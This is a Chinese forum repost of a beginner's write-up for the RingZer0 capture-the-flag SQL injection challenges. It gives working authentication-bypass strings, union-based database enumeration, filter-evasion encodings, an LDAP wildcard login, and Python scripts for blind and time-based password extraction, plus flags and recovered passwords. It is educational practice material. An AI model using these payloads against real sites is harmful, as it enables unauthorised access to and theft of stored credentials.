搜索
查看: 1373|回复: 0

萌新福利—sql注入之旅

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2018-4-23 11:58:13 | 显示全部楼层 |阅读模式
原文链接:https://xz.aliyun.com/t/2298
前记
最近发现了一个有趣的练习网站~里面有大量web题目,其中sql注入的题目也是由浅入深,适合萌新入门
给出网站地址
  1. https://ringzer0team.com
复制代码
Most basic SQLi pattern.(point 1)
签到题:
  1. username: admin'#
  2. password: 1
复制代码
可以得到flag:FLAG-238974289383274893
ACL rulezzz the world.(point 2)
随手测试
  1. username=admin'
复制代码
得到
  1. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 4
复制代码
随手闭合一下
  1. username=admin' or 1#
复制代码
得到flag:FLAG-sdfoip340e89rfuj34woit
Login portal 1(point 2)
过滤了
  1. #
  2. --
  3. =
复制代码
其他没测试,直接随手pass
  1. username=admin' or 'a' like 'a&password=1
复制代码
即可拿到flag:FLAG-4f885o1dal0q1huj6eaxuatcvn
Random Login Form(point 2)
随手试了一下二次注入,发现有点不像
于是进行长度截断
注册
  1. username=admin                                    1
  2. password=1
复制代码
登录
  1. username=admin
  2. password=1
复制代码
得到flag:FLAG-0Kg64o8M9gPQfH45583Mc0jc3u
Just another login form(point 2)
尝试了一下无果,于是尝试联合注入

  1. username = admin' union select md5(1),md5(1),md5(1)#
  2. password = 1
复制代码
得到回显:Bad search filter
搜索发现是LDAP的特定错误
于是登录
  1. username = *
  2. password = *
复制代码
得到flag:FLAG-38i65201RR4B5g1oAm05fHO0QP
这是一个值得研究的点,默默记下了~最近的sql注入很少见,记得以前XCTF联赛中出现过~
Po po po po postgresql(point 2)
随手试试
  1. username=admin' or 'a' like 'a&password=1
复制代码
回显
  1. ERROR:  invalid input syntax for type boolean: "admin"
  2. LINE 1: SELECT * FROM users WHERE (username = ('admin' or 'a' like '...
复制代码
于是闭合
  1. username=admin') or 'a' like 'a') -- &password=1
复制代码
得到flag:FLAG-mdeq68jNN88xLB1o2m8V33Ld
Don't mess with Noemie; she hates admin!(point 3)
尝试
  1. username = admin' or sleep(5) or 'a' like 'a
复制代码
发现sleep成功
说明闭合有效
那么直接刚
  1. username = admin' or 'a' like 'a
复制代码
发现登录失败
那么猜想后台语句
  1. $sql = select * from users where username='$username' and password = '$password'
复制代码
所以我们尝试


  1. username = 1' or 1 or '
  2. password = 1
复制代码
带入即
  1. select * from users where username='1' or 1 or '' and password = '1'
复制代码
即可成功绕过
得到flag:FLAG-Yk3Hfovvb5kALU9hI2545MaY
What's the definition of NULL(point 3)
看到url:?id=MQ==
明显是base64
解一下,发现是:id=1
随手测试
  1. id = 1'#
  2. id = MScj
复制代码
得到
  1. SQLite Database error please try again later.
复制代码
然后自己测试了很久无果
回到起点,想起来他有描述
  1. Hint WHERE (id IS NOT NULL) AND (ID = ? AND display = 1)
复制代码

看来后台sql的确是这么写的
  1. WHERE (id IS NOT NULL) AND (ID = base64_decode($_GET[id]) AND display = 1)
复制代码
构造


  1. 0) OR (ID IS NULL) OR (1=2
复制代码
带入得:

  1. WHERE (id IS NOT NULL) AND (ID = 0) OR (ID IS NULL) OR (1=2 AND display = 1)
复制代码
编码一下
  1. ?id=MCkgT1IgKElEIElTIE5VTEwpIE9SICgxPTI=
复制代码
得到flag:FLAG-sQFYzqfxbZhAj04NyCCV8tqA
这个题也挺有意思的,值得研究一下~
Login portal 2(point 3)
上去就尝试


  1. username = 1' or 1 or '
  2. password = 1
复制代码
毕竟老套路
回显
  1. Wrong password for impossibletoguess.
复制代码
发现impossibletoguess很可疑
可能是个用户名,竟然回显了,那试试union

  1. username = 1' union select 1,2#
  2. password = 1
复制代码
回显
  1. Wrong password for 1.
复制代码
剩下的就是联合注入了
  1. 1' union select (select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),2#
  2. Wrong password for users.
  3. 1' union select (select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users'),2#
  4. Wrong password for username,password.
  5. 1' union select (select username from users limit 0,1),2#
  6. Wrong password for impossibletoguess.
  7. 1' union select (select password from users limit 0,1),2#
  8. Wrong password for 1b2f190ad705d7c2afcac45447a31b053fada0c4.
复制代码
长度40的密码,显然不是md5,猜测为sha1
联合注入
  1. username = impossibletoguess' union select sha1(1),sha1(1)#
  2. password = 1
复制代码
登录成功,得到flag:FLAG-wlez73yxtkae9mpr8aerqay7or
Quote of the day(point 4)
随手测试id
  1. ?q=2'
  2. No result found for id "2'"
复制代码
发现可以回显,尝试Union,发现空格被过滤,用%0a绕过
  1. ?q=2%0aunion%0aselect%0a1,2#
  2. Quote of the day: No one forgives with more grace and love than a child.
  3. Quote of the day: 2
复制代码
然后老套路即可:
  1. ?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(
  2. TABLE_NAME)%0afrom%0ainformation_schema.TABLES%0awhere%0aTABLE_SCHEMA=database())#
  3. Quote of the day: No one forgives with more grace and love than a child.
  4. Quote of the day: alkdjf4iu,quotes
  5. ?q=2%0aunion%0aselect%0a1,(select%0agroup_concat(COLUMN_NAME)%0afrom%0ainformation_schema.COLUMNS%0awhere%0aTABLE_NAME=0x616c6b646a66346975)#
  6. Quote of the day: No one forgives with more grace and love than a child.
  7. Quote of the day: id,flag
  8. ?q=2%0aunion%0aselect%0a1,(select%0aflag%0afrom%0aalkdjf4iu%0alimit%0a0,1)#
  9. Quote of the day: No one forgives with more grace and love than a child.
  10. Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J
复制代码
over~
Thinking outside the box is the key(point 4)
随手尝试
  1. ?id=2’
复制代码
得到
  1. SQLite Database error please try again later.
复制代码
知道了是SQLite
继续测试
  1. ?id=2 and 1=2 union select 1,2 from sqlite_master
  2. 2
  3. ?id=2 and 1=2 union select 1,sqlite_version() from sqlite_master
  4. 3.8.7.1
  5. ?id=2 and 1=2 union select 1,((select name from sqlite_master where type='table' limit 0,1)) from sqlite_master
  6. random_stuff
复制代码
依次类推,得到所有表名


  1. random_stuff
  2. ajklshfajks
  3. troll
  4. aatroll
复制代码
我选择ajklshfajks
根据之前的经验,应该是flag字段了
  1. ?id=2 and 1=2 union select 1,((select flag from ajklshfajks limit 0,1)) from sqlite_master
  2. FLAG-13lIBUTHNFLEprz2KKMx6yqV
复制代码
over~
No more hacking for me!(point 4)
好坑,f12源代码里有说明


  1. <!-- l33t dev comment: -->
  2. <!-- No more hacking attempt we implemented the MOST secure filter -->
  3. <!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->
复制代码
我说我为什么一直做不出来:(
发现这一点后就很容易了:
  1. http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527  limit 0,1 --
  2. http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527  and tbl_name=%252527random_data%252527 limit 0,1 --

  3. random_data  CREATE TABLE random_data (id int, message varchar(50), display int)

  4. http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --
复制代码
即可得到flag
  1. FLAG-ev72V7Q4a1DzYRw5fxT71GC815JE
复制代码
Quote of the day reloaded(point 5)
感觉题目是不是有点脑洞?还是我没发现
尝试来尝试去,发现这样可以成功
  1. ?q=3\&s=ununionion select 1,2%23
  2. Quote of the day: Famous remarks are very seldom quoted correctly.
  3. Quote of the day: 2
复制代码
union要双写绕过
  1. ?q=3\&s=ununionion%20select%201,(select%20group_concat(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=database())%23
  2. Quote of the day: Famous remarks are very seldom quoted correctly.
  3. Quote of the day: qdyk5,quotes
  4. ?q=3\&s=ununionion%20select%201,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7164796b35)%23
  5. Quote of the day: Famous remarks are very seldom quoted correctly.
  6. Quote of the day: id,flag
  7. ?q=3\&s=ununionion%20select%201,(select flag from qdyk5 limit 0,1)%23
  8. Quote of the day: Famous remarks are very seldom quoted correctly.
  9. Quote of the day: FLAG-enjlleb337u17K7yLqZ927F3
复制代码
over~
(注:虽然做出来了,还是觉得摸不着头脑,感觉关联性不强啊,我也是随手试出来的= =)
Hot Single Mom(point 6)
看到描述
  1. Get laid or get lazy it's up to you
  2. Find online hot single Mom
复制代码
就知道不是什么正经题目,果然网站挂了(滑稽)
但是有说明题目来源:GoSecure CTF 2014
搜索了一下
  1. https://gist.github.com/h3xstream/3bc4f264cc911e37f0d6
复制代码
应该是道不错的注入题目
有flag:FLAG-wBGc5g147MuVQuC28L9Tw8H8HF
Login portal 3(point 6)
这题我用了盲注,但是目前为止这是第一道用盲注的题,所以不知道是不是做麻烦了~
脚本如下
  1. import requests
  2. import string
  3. url = "https://ringzer0team.com/challenges/5"
  4. cookie = {
  5.     "PHPSESSID":"27vctgun5jjk5ou82oqv9clog2",
  6.     "_ga":"GA1.2.1724649637.1519735081",
  7.     "_gid":"GA1.2.933125333.1519735081"
  8. }
  9. flag = ""
  10. for i in range(1,1000):
  11.     print "i:",i
  12.     for j in range(33,127):
  13.     #for j in "0123456789"+string.letters+"-_!@#$^&*()={}":
  14.         data = {
  15.             #"username":"1' or (substr((database()),%s,1)='%s') and 'a'='a"%(i,j), login3
  16.             #"username": "1' or (substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1)='%s') and 'a'='a" % (i, j), users
  17.             #"username": "1' or (substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x7573657273),%s,1)='%s') and 'a'='a" % (i, j),username,password
  18.             "username": "1' or (ascii(substr((select password from users limit 0,1),%s,1))=%s) and 'a'='a" % (i, j),
  19.             "password":"1" #SQL1nj3ct10nFTW
  20.         }

  21.         r = requests.post(data=data,url=url,cookies=cookie)
  22.         if "Invalid username / password" in r.content:
  23.             flag += chr(j)
  24.             print flag
  25.             break
复制代码
列名我没跑(滑稽脸),毕竟知道了他的套路,猜测是password,一猜就中~~
最后得到密码
  1. SQL1nj3ct10nFTW
复制代码
登录拿到flag:FLAG-vgnvokjmi3fgx0s23iv5x8n2w2
When it's lite it's not necessarily easy(point 6)
随手测试


  1. username = 1' or sleep(5) or 'a'='a
  2. password = 1
复制代码
发现报错
  1. SQLite Database error please try again later. Impossible to fetch username & password from users table
复制代码
这也省事了,直接把列名,表名都弄出来了
于是直接取password进行盲注即可

  1. import requests
  2. import string
  3. url = "https://ringzer0team.com/challenges/19"
  4. cookie = {
  5.     "PHPSESSID":"27vctgun5jjk5ou82oqv9clog2",
  6.     "_ga":"GA1.2.1724649637.1519735081",
  7.     "_gid":"GA1.2.933125333.1519735081"
  8. }
  9. flag = ""
  10. for i in range(1,1000):
  11.     print "i:",i
  12.     for j in "0123456789"+string.letters+"-_!@#$^&*()={}":
  13.         data = {
  14.             "username": "1' or (substr((select password from users limit 0,1),%s,1)='%s') and 'a'='a" % (i, j),
  15.             "password":"1" #4dm1nzP455
  16.         }

  17.         r = requests.post(data=data,url=url,cookies=cookie)
  18.         if "Invalid username / password" in r.content:
  19.             flag += j
  20.             print flag
  21.             break
复制代码
得到密码


  1. 4dm1nzP455
复制代码
登录拿到flag:FLAG-rL4t5LRMwjacD82G9vpAd6Gm
Internet As A Service(point 7)
疯狂测试后得到payload:


  1. /?s = 1'<0e0union select 1,2,3#
复制代码
然后老套路即可


  1. ?s=1'<0e0union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1#
  2. iaas
  3. ?s=1'<0e0union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA like 0x69616173 limit 0,1#
  4. iaas
  5. rz_flag
  6. ?s=1'<0e0union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME like 0x727a5f666c6167 limit 0,1#
  7. flag
  8. ?s=1'<0e0union select 1,2,flag from rz_flag limit 0,1#
  9. FLAG-0f6Ie30uNz4Dy7o872e15lXLS2NKO1uj
复制代码
over~~
Login portal 4(point 7)
这题用了时间盲注
脚本如下
  1. import requests
  2. url = "https://ringzer0team.com/challenges/6"
  3. cookie = {
  4.     "PHPSESSID":"vtqgjp8amva1fsr6eolee70af4",
  5.     "_ga":"GA1.2.1724649637.1519735081",
  6.     "_gid":"GA1.2.933125333.1519735081",
  7.     "_gat":"1"
  8. }
  9. flag = ""
  10. for i in range(1,1000):
  11.     for j in range(33,127):
  12.         print "i:", i,"j:",j
  13.         data = {
  14.             "username":"1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '"%(i,j),
  15.             "password":"1"
  16.         }
  17.         try:
  18.             r = requests.post(url=url,data=data,cookies=cookie,timeout=2.5)
  19.         except:
  20.             flag += chr(j)
  21.             print flag
  22.             break
复制代码
得到密码:
  1. UrASQLi1337!
复制代码
登录后拿到flag
  1. FLAG-70ygerntbicjdzrxmm0rmk0xx2
复制代码
后记
本人算是抛砖引玉啦~由于能力有限,只能给出大部分题目题解,还有一些有趣的题目待大家继续深挖啦~期待与各位大师傅的套路~Orz




过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表